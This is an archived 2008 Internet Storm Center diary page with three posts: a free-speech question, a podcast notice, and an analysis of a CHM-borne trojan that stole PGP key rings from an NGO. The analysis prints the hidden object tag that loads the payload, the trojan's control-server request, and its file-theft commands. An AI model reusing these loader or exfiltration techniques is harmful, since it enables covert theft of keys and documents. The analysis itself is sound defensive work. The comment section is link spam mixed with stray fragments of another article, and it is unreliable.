Freedom of Speech...or not?

Published: 2008-03-27
Last Updated: 2008-03-27 22:33:38 UTC
by Pedro Bueno (Version: 1)
4 comment(s)

When you are in your own country, you know your limits about what to say or not. This is valid for conferences, interviews, etc...

The thing is, when you are going to a foreign country, you may not know how is the freedom of speech there, so, it may become quite dangerous if you want to speak something about the country that is hosting the event.

I am going to be giving a talk in Hong Kong on hacking/security topic in a near future. I need to know what would happen if I say that China is a source of lot of the problems that I see...

Would I be in jail right after the talk? Would I be prosecuted?

I know that Hong Kong have different laws than the China itself, but it is definitely a good question, specially for me...;)

Also, if you know of a country that I would also find these kind of problems, please let me know.

-------------------------------------------------------------------------------

Pedro Bueno ( pbueno //&&// isc. sans. org. )

 

Keywords: china
4 comment(s)

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:58 UTC
by Maarten Van Horenbeeck (Version: 1)
2 comment(s)

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

object width="0" height="0" style="display:none;"
type="application/x-oleobject" codebase="music.exe"

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

      <Command Begin>
      netmgetr usb:\*.doc
      netmgetr usb:\*.pkr
      netmgetr usb:\*.skr
      netlsr usb:\*.*
      <Command End>

Upon further review of the trojan code, netmgetr scanned the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but this was more proof-of-concept code.

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to “map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

There are two things we can learn from this:

  • It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";
  • When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

Cheers,

Maarten Van Horenbeeck
maarten at daemon.be

2 comment(s)

Internet Storm Center Podcast

Published: 2008-03-27
Last Updated: 2008-03-27 17:25:21 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)
Quick update: The last episode ("Episode 1") is not available as MP3. We had some issues with MP3s initially, but I think its solved now. Enjoy.

Joel and I got together to record a podcast. We would like to make this a regular feature, and include the monthly threat update webcast. The idea is to create an episode every 2 weeks. One episode each month will be published on "reboot wednesday". Another episode would follow 2 weeks later.

At this point, I set up 4 "Episodes"

 

  • 2 old webcasts (the last two) unchanged.
  • 1 "presentation" with slides about getting started with IPv6
  • and the new "podcast"

At this point, this is a test to see how the different formats work and which format you prefer most. The last "episode" is what I think these podcasts will come out like in the future. We are very interested in feedback!

(and yes... we know Joel is a bit "soft"... its hard to get me quiet... i had the microphone running with attenuator and put it about 3 feet away from me)

Try to search for the podcast in itunes if you use itunes (it should be up there... but I haven't found it yet :-( )
iTunes direct URL: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=276609412(iTunes hasn't indexed our podcast yet, so you have to use this direct link)
The direct URL for the podcast: http://isc.sans.org/podcast.xml

------
Johannes B. Ullrich Ph.D.
jullrich \a t/ sans.org

Keywords: podcast
4 comment(s)

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives